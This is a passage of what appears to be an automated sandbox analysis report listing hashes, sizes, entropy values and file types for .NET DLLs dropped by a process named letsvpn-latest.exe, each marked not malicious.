                                                                                                                                                                                                  Size (bytes):52256
                                                                                                                                                                                                  Entropy (8bit):5.867121098890678
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:tszrvuWznnuJlMeEM8Hy8d4Vx50lAhDVC+mq3b2KZBZcaS+ST6nksL:tgrvuqcP8RE5tQ+J3qKH/mqL
                                                                                                                                                                                                  MD5:438EA6C5B869E778CD9B96D37A827BBF
                                                                                                                                                                                                  SHA1:2F12F7ECC47EF9C2BD899811343BD49BE1AC74DA
                                                                                                                                                                                                  SHA-256:1A64B14FB86A517CBB62319543BBB2BE415B5FFF7E52FC356BAEB5E549267F38
                                                                                                                                                                                                  SHA-512:5E0E170DBE2AF3BE6B975EE33D87E8C26097A8C4F722EEAD41EE8F7815D29B17DD845B8BA2AD1FC85D6963D7EFBD950B646770465E5F37F04D90416301207844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30240
                                                                                                                                                                                                  Entropy (8bit):6.439683136275158
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:T47XzsCggQsW7Sl8xjP/QZsq3b2KZBZQS+ST6nkt:k7XgpRxb/kn3qKe/m3
                                                                                                                                                                                                  MD5:4E6698EF08CFF72D265F37D91F40B32F
                                                                                                                                                                                                  SHA1:4C3FD998F328AA109C8F06DA48233A0E97BBF140
                                                                                                                                                                                                  SHA-256:B668AFE067181342CDE9BCE756D559DBB89A77CF57C6D43248209F9D5B9E5123
                                                                                                                                                                                                  SHA-512:CE2BB74A70875A97372859C6D857898217747C180B546439958C0B3DF0C525CE1857D4942590CAEDDA4E06A1C7BD8BD24E17422E07CDF2D87285D878BDE9175E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.817500254068075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rEwo6eTs14YY4cWpOWqhqWOHlLf2KQcvBZ9tm9dZS+ShjmM6IGBkSlp:AwDdT+q3b2KZBZcS+ST6nkYp
                                                                                                                                                                                                  MD5:593DCCB65E6B3FA04C7BAF70468FB246
                                                                                                                                                                                                  SHA1:604295C9FCE17F74C615F01099F299B893DC578A
                                                                                                                                                                                                  SHA-256:9DB72960541B2D616BE36E4B93A6A1E175C3BA19FF499F4FA52F65BE9B0A118D
                                                                                                                                                                                                  SHA-512:1B3F9D7CF29B55AE376144642DDACEB4F838D74B4FECC1F43B51ED773011020E6FD3CB2DCC4882CFCFD815873EF36DB8C37F2B3EE4BDEF5C04E32C896354520A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.955751189727143
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qSKiWIhWghqWOHlLf2KQcvBZ9s4WS+ShjmM6IGBkSavP:qSK8Tq3b2KZBZLWS+ST6nkPn
                                                                                                                                                                                                  MD5:12E1F87B4E4AE9C1B2C0B869C1C245D0
                                                                                                                                                                                                  SHA1:0827BCB962BF1A46FB2FCDFF1650E659E8B571F9
                                                                                                                                                                                                  SHA-256:B150643E26EF1B14B56F2937943E7A33386A8EDEA200219350B65C1998624973
                                                                                                                                                                                                  SHA-512:E7C0D6E031B82F6C11A35587AAD76C3C50E0ABAFD55CADF8A17F79C095B59811B1082FFF18D9C9CD67742627F161D4B7D72A64F542D540F244289761F206DDD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.896920735077221
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/0KbZWApWmWTpWmyhqWOHlLf2KQcvBZ9Qr3RS+ShjmM6IGBkSAB0i:sKRylGq3b2KZBZyhS+ST6nkR0i
                                                                                                                                                                                                  MD5:AB085119653ACB754C41844348FE3F5F
                                                                                                                                                                                                  SHA1:0118CBCF925712558061C5E9E271C794B5533B6A
                                                                                                                                                                                                  SHA-256:C02843ABE60064456389B7F9727661DCFE02523B5161A4DA8963B400471961C9
                                                                                                                                                                                                  SHA-512:6A615675953BCC9DB39B77EF4D8E44E3E215A4F986678F997AD17615B4D7CFBE1F2167371DE04E77278129D8C25B6C327E9F928B4F1F329A531F4C52750C8D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.972496245661368
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XLH9W5nOWihqWOHlLf2KQcvBZ9c9TyS+ShjmM6IGBkS9f08:XL4Gq3b2KZBZQyS+ST6nk+f08
                                                                                                                                                                                                  MD5:3C3E85085D12983A32AD6C6A2CA91BBA
                                                                                                                                                                                                  SHA1:378F899018CEB4B24F22BCF0E9BD2AE0324C45CD
                                                                                                                                                                                                  SHA-256:03EFEB3214F6D2811BABD2A6DFCF6B512B0CC9D1E11FFB24ABB88E5866DD4F64
                                                                                                                                                                                                  SHA-512:6CE6250595400D5CDAE6ADCE03E43C8ADDF4AE65F33AE7EDB94094301D5498EF0C9453B00850A8D23A8462E199FCFC10A450D2B4A29F4C10BBC311407ECD4158
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876963437900696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2lbWvX+W2hqWOHlLf2KQcvBZ9mVS+ShjmM6IGBkSD:22iq3b2KZBZaS+ST6nkM
                                                                                                                                                                                                  MD5:A3C1273F2145FB8D93DECB44CE19B403
                                                                                                                                                                                                  SHA1:E9733AFA79116C1BC21C280FD84A98599D43543F
                                                                                                                                                                                                  SHA-256:45D4AC5C94A5CF78D2E4ED795767550407C4E3ED2C9E481E0DBBA71DAF331D41
                                                                                                                                                                                                  SHA-512:259BC3A26D1E20EE16D10E3BAF563B4DC0C24F4525AB786C70FB3DC9EFC7042F9177A24836DDE2A3D5E45715CD2FA7FAC8B97DAA49DE5C33C6E72908C4F19B50
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89250295264903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:c2mtX7WWRvWWchqWOHlLf2KQcvBZ9bYD5RkS+ShjmM6IGBkS+fk:c28XdMq3b2KZBZVkkS+ST6nkpfk
                                                                                                                                                                                                  MD5:972D2CD78F6CF7267CB7BB5FB90CEF7E
                                                                                                                                                                                                  SHA1:16FA79E77AD04062E741887F2C20886E08498D51
                                                                                                                                                                                                  SHA-256:81C839BB8194AF5342D84F0CDF0CD30A37AE391B2B0F871C206BD20CA22FDDDA
                                                                                                                                                                                                  SHA-512:C85D368805D0D2C7409A249D4F7253A7CB75C05F2AF8C49479F375C2AEA4F38EDC0FFE0D4D2E9B21AAEAA94A7D4ED8A42C0A121B7BCF74DC3F26CE70879E7ED6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.538265849347418
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:p8h2IgODoeNlPSCqWvVEWJlhqWOHlLf2KQcvBZ9S1GS+ShjmM6IGBkSLE:6z1zNlFBvLq3b2KZBZwGS+ST6nkv
                                                                                                                                                                                                  MD5:9C025374184B9455320FA76092C9E5AF
                                                                                                                                                                                                  SHA1:3DA46D5C933E60CFD117B7EA37014D6D79A0C227
                                                                                                                                                                                                  SHA-256:35457DFAD21D597170CDD44BA7B80618CDF15E3D8F30DD417D6AA8A8A06B15C6
                                                                                                                                                                                                  SHA-512:12D92DB376BB8F1F50034855C51D0D9DF8B4483F3F2CD80CF6B18373A53269C020AA36D897AE4FC30563B0299018DB0E1BFAAB16AAA48409C0536B23D5002417
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.920981860705336
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CLkW1JgWBhqWOHlLf2KQcvBZ9jDU4S+ShjmM6IGBkSlxxl:CVJq3b2KZBZK4S+ST6nkAxl
                                                                                                                                                                                                  MD5:F80FEE9B7D237CC74781BE1FA407C84F
                                                                                                                                                                                                  SHA1:F25C6840EF0A9474A049A4720F18B3F3D35825F4
                                                                                                                                                                                                  SHA-256:945C8142C6DCE8DF9B3CA23EA98D46045051C4FA513329EED22C4B3806A4B4EC
                                                                                                                                                                                                  SHA-512:3ED8D958C78B6452BE1E104E4655B9B8CBF43C6B8DD2E08CD1C75FE4FDCAA950521E9538EFC7316A022AF223B00AD88F4134DEA6B4D22E051D8BFF87C636655C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.829709317092374
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iISW5NW2eWhhqWOHlLf2KQcvBZ9qfAzhaS+ShjmM6IGBkS5M:i+5bPq3b2KZBZB8S+ST6nkF
                                                                                                                                                                                                  MD5:A3AFDF77AF6A68CDEF15B468470622A3
                                                                                                                                                                                                  SHA1:C7F9B758569CF66D77A201B3E9D8F1FDE7640103
                                                                                                                                                                                                  SHA-256:72DAC6728F516A6B909A6CEBE7838D6493F63A3FCDADE001AC32A77D32876C1B
                                                                                                                                                                                                  SHA-512:D453817F6198A302FECD8736CE4C1B3D9CF59BDCE484FDFE91860D8BEB8A8EAA50FF401BCB9D5F7F2EB9E06ED521AD4C22CD7E102C0D2EBB90BD6DCCCAB36467
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.804006840038962
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ChO4YkTdk8VKWCWV1upaW4hqWOHlLf2KQcvBZ9eMKQAS+ShjmM6IGBkSe:ChOSQ6q3b2KZBZuQAS+ST6nkR
                                                                                                                                                                                                  MD5:76DAF9C183DCC2B6BC7D4376DE0F21D6
                                                                                                                                                                                                  SHA1:0BEE15FE2B57C824A9A4AD663650A15E74CEA05C
                                                                                                                                                                                                  SHA-256:AE21471D5490904DD73A086B6E59A489230756F9560E07871721B6E5AC7D0F53
                                                                                                                                                                                                  SHA-512:800371B0724081D406A560F44E02D9636E5FF0DA9C32061C388545E2CB92B68576E912C6D90F4176286559F1B8EE11167B270166682BA229843D5356C7DAE80D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):764448
                                                                                                                                                                                                  Entropy (8bit):7.47717615350681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:SILs7xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPq7:jG9km6k/IwRYbiBeKGCz7
                                                                                                                                                                                                  MD5:8A309D9D04F95D704D1B3B9DE0CB3F40
                                                                                                                                                                                                  SHA1:239B41D00B0E3F694D5E8D44594A69ADD9E40AD6
                                                                                                                                                                                                  SHA-256:4CCB06D83139AFECF2676E354404BCB5B08E813678E88AFBBC416F897A83C4BC
                                                                                                                                                                                                  SHA-512:2C240259B33BD1E38F696F13E6B57C87F9656AF70973C83EF2A3153B3D05033212CF8F87CAF23DCDB71ADE5F4775900EEB27A2606D879CA1E1B79CDDCF2F05A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.977283829370365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6b1nWCXWThqWOHlLf2KQcvBZ9cWS+ShjmM6IGBkSNzw:E70q3b2KZBZrS+ST6nkN
                                                                                                                                                                                                  MD5:23EBB78F471F77A02CA547D47DAC28E9
                                                                                                                                                                                                  SHA1:46077E24AEF1939A27130CD83B645799685165D2
                                                                                                                                                                                                  SHA-256:647675A1BBB73058745FD67A25DF60FF300FD47421A4806D12A8C1DB5C7521BD
                                                                                                                                                                                                  SHA-512:CEF961FFB116A405B457B12E3FAD689AB80E41160F293631B4B9146F6B4F8A0E15DBDF58DCBCA94638DA6FF97C3FB3359FCE92D3D0FDEEE81FB314C9411780EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.887674507025203
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W9yW7TWjhqWOHlLf2KQcvBZ9yN4S+ShjmM6IGBkSJTo:ofYq3b2KZBZpS+ST6nkko
                                                                                                                                                                                                  MD5:EE18D84D95C0F1535EA84126F1CEBC56
                                                                                                                                                                                                  SHA1:EFB937BE1FBBB7149F49C3BB3860A511BC789072
                                                                                                                                                                                                  SHA-256:C659E7D9EF2F3E72FF750CDBF5792D327F012782C3F888449546558C352E8925
                                                                                                                                                                                                  SHA-512:1DECAD4D100507A1878C254A83CEDBA000493DF972A4CDB1D955FFA4E1EC31485DAB0AC842F12185E9169A85A86301FCF18D61A175B43C2400B3024C384DACEB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012009934217988
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:06Rb32WVzWFhqWOHlLf2KQcvBZ9VBcuS+ShjmM6IGBkSvU:DRb3daq3b2KZBZrdS+ST6nkEU
                                                                                                                                                                                                  MD5:87470FF818547DFB3CF7813EB07C9617
                                                                                                                                                                                                  SHA1:555FA45A05C9E803617EA872BE534E65009B3504
                                                                                                                                                                                                  SHA-256:6F6CE08335FA5FA55278C254FCE2D4DC611531AA53F7DE574991BBAD7888F28E
                                                                                                                                                                                                  SHA-512:3E941B496B0635AC719052CC0ED4B2A0B941D30E50261E46D53CEAA3F120970655EACD6DE7C63460CBB9F4B603EEAE9B3EF251C32ACE5668FF37BF4282CEAC93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32800
                                                                                                                                                                                                  Entropy (8bit):6.421442296570712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7MWavA+YHfsZtaOq3b2KZBZcNmS+ST6nk0:7CvA+YEuB3qKD/mC
                                                                                                                                                                                                  MD5:D6DB8C4DD199D5EA11638B21B2DA3516
                                                                                                                                                                                                  SHA1:D1853A51FEF8536FBE2B01BB84053E058FDAED04
                                                                                                                                                                                                  SHA-256:D6A7F97C2E73061FE74C5F890984C8F58653FE68BE3BEEF507F6530DE2896309
                                                                                                                                                                                                  SHA-512:956C15A5FCC5B746D18FABADFE1BFDBF40509BF617C18CF7A4AC47A7739E6FC56F115450871B8C4C5DC999FF9B816241C1E3F49F366358ACABC632C8AEB0AF90
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33312
                                                                                                                                                                                                  Entropy (8bit):6.627433940507071
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:nu5I+sqOylryry8qqIfUc7a5Fq3b2KZBZ1S+ST6nkv7:nYIVBpry8qqIfUcm5A3qKX/mx7
                                                                                                                                                                                                  MD5:500D590818EEB1D5F425F37A29B4DD6F
                                                                                                                                                                                                  SHA1:C97012B1C9E7BB5E1C4DB172828535986B9B5800
                                                                                                                                                                                                  SHA-256:F5B75FE483F7AE77438E8E5158E7ED5BBCD16BA2787AA92FE69596C0205BA836
                                                                                                                                                                                                  SHA-512:BA1C02BAA82BCCB1A391156E0B2070CEF76E4DD3B35C30BB5060C9320574ECE35F11FE19B077E24287B6AC53BFDE59F858D4D64CCA2CEB4AD5F05E2493EF2229
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28704
                                                                                                                                                                                                  Entropy (8bit):6.595812815283715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MRZ4nNxnYTb6Blh9q3b2KZBZiiS+ST6nkb:PYTb6vho3qKb/mh
                                                                                                                                                                                                  MD5:8E14D9F0BF87605E6535D68B0FD8C56B
                                                                                                                                                                                                  SHA1:A9D03FC849BEDD0C91A891E26B670A408D446D6E
                                                                                                                                                                                                  SHA-256:C7B3C34060A40BBE58CE03D4B296556B7186D08FE9A99E27D4A15951CF2CF80C
                                                                                                                                                                                                  SHA-512:4178EDB29B147D35A4F826B19EF220FC8EAE704BB3D1354058A41E775CB517B5576D7793C8BD6DA07C986EA2E2464844AF7BC95E3659661901F35BD437649BC5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.97531319551383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Fvn4HREpWiQWjhqWOHlLf2KQcvBZ9fbS+ShjmM6IGBkSj:qSHq3b2KZBZlS+ST6nkI
                                                                                                                                                                                                  MD5:BB76B6B59F9B91669E4E620BCFBF45E0
                                                                                                                                                                                                  SHA1:4B251EBC28FE4C9257080EFC7B4146F7F2025230
                                                                                                                                                                                                  SHA-256:71E214159B5342A03F6343C4ECA5623C6948455BA2F509720BFDE70D804B35C7
                                                                                                                                                                                                  SHA-512:9255352F3A3FE4A63DC05D191F604E47D7C2681CFAE90CC412937EB9D47ACA79E3C32DD6B491F2FB4E1391A452E7D9C5D3317E63A4C1B6460E532FA96FC488AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.878055743773289
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:y8MjKb47T3UCcqFMkJ59WdtW0hqWOHlLf2KQcvBZ98imTKS+ShjmM6IGBkSubu:/MjKb4vcGdObq3b2KZBZbCKS+ST6nk7S
                                                                                                                                                                                                  MD5:539E2BD6B494B24A740542D5848CEAD2
                                                                                                                                                                                                  SHA1:C9E763F47309E326958EDF77BCAF6A220B1E69B9
                                                                                                                                                                                                  SHA-256:34D54D62F359CAFFF810A522F654B02BF00C8EC5B0315D37C343673223272DED
                                                                                                                                                                                                  SHA-512:CEB43F8BD718ACACFD52B2BFE7DB3ED043E465E2133B0F86C7582C9FECDB58CD08ECBB1A1F4D975581227E235A785BD9C9F2309857C0C7F6588D3AC71E6E65AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969645890003852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LzyNXd4+BW6FWahqWOHlLf2KQcvBZ9nxdS+ShjmM6IGBkSE0:Czhq3b2KZBZxS+ST6nkA
                                                                                                                                                                                                  MD5:CF6552D68B6F1C55F3C689DD9C0EE2E6
                                                                                                                                                                                                  SHA1:37723E957F45EF8A943BAB49EDAA7EA4F18EEA23
                                                                                                                                                                                                  SHA-256:2CE7C251CE22D21A90E801EE0264778CD292A9271CF50B9FEB8F5762CCD4BF97
                                                                                                                                                                                                  SHA-512:50256B2D874FF70AEB52838EB64E7B8C7DBF3E2D5617EDF3E711648FB65C6E0234AA4660FBFC0AECF598F1E318B42CE57AB1141F1D2A7BC7312EEC52C452B9CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96528000837832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Zvs2Q3HKJNrWWRWOhqWOHlLf2KQcvBZ93d6S+ShjmM6IGBkSzL:ZuM9q3b2KZBZv6S+ST6nkML
                                                                                                                                                                                                  MD5:1592C7E948FF7CDFE8D93D07B285AB46
                                                                                                                                                                                                  SHA1:84A0AFFB12888F576A8367AB3FFE3311CDC0E781
                                                                                                                                                                                                  SHA-256:D39637DA74B212D707EF62FFB5508AA03D33EACB3CE467519C018691178AE9BB
                                                                                                                                                                                                  SHA-512:EB71D470608717A1321CBDDA85484D091BE992FD23983BF2212CA2088FC613F8E13BFAB85F48C7FBA8199508F0E6F2446F6E414A8FDB9D7AB28E180C80FFC3F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.93954537010736
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vFz0Q6gcqRhcsMWdMW3hqWOHlLf2KQcvBZ9viS+ShjmM6IGBkSPC:vFz1c67q3b2KZBZIS+ST6nkV
                                                                                                                                                                                                  MD5:15CDE5130A757AE138879A5B76880593
                                                                                                                                                                                                  SHA1:4B29C1BD9B3809A39607A3D972280DFE7CCD07A1
                                                                                                                                                                                                  SHA-256:3469C44E1E8480D20FECD1A45151BB9C7DE737B8F906F28D793838AA04200877
                                                                                                                                                                                                  SHA-512:A4DD3CA58859CFC9FD9690E3145297452EEED596FD7360EB2D863677598726427B7DC5C860EEF56BA8538A204A4C6ACCFDC9ABE8D1FD1323B766EB039FEE70A3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.837689115862053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:F6xWA3W4aW/NWChqWOHlLf2KQcvBZ96U9HS+ShjmM6IGBkSB:FaBRq3b2KZBZ9JS+ST6nkW
                                                                                                                                                                                                  MD5:22012E4D0DD60A9988E005A03199702F
                                                                                                                                                                                                  SHA1:1EAF9418A32EC551423F8B51946F74A3E1517252
                                                                                                                                                                                                  SHA-256:D3B318DFF6DA0D3646A56C124F1A81A3111CD12730356F8396888F2CF074D61F
                                                                                                                                                                                                  SHA-512:E7FC15AE7FE54013803B242C945D670596B412C98BC8FEFE000110176217B7D7523D5E2424093D138CBA04B7C0937A7E8CB54E963D66E1533283E10259F8D2DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):74784
                                                                                                                                                                                                  Entropy (8bit):5.993362873950785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:r784YWau8lqubx6WxXLA+o2SLFyEdux136ytgHo0AuresehSAS3qKw/mg:r7NV8v36tI0XCKASM//
                                                                                                                                                                                                  MD5:B858455996C84CB4A2E23E77F5DD2052
                                                                                                                                                                                                  SHA1:E3C301E11B436F05BDD431515EA0AC4EE8F3E621
                                                                                                                                                                                                  SHA-256:56CA971A57FFE258049F47CF0C292BA33FC8206A2B6006391CA9C222BF959AF3
                                                                                                                                                                                                  SHA-512:7E54B175EB40304211EB9C0CAACF1CDF51C2679C940B33AF679165F3EAAA3B1531BC53F9F98FCD431E55DF0CCFE12C464DE0F3783AE13FBC6EF2AA4EC1294442
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
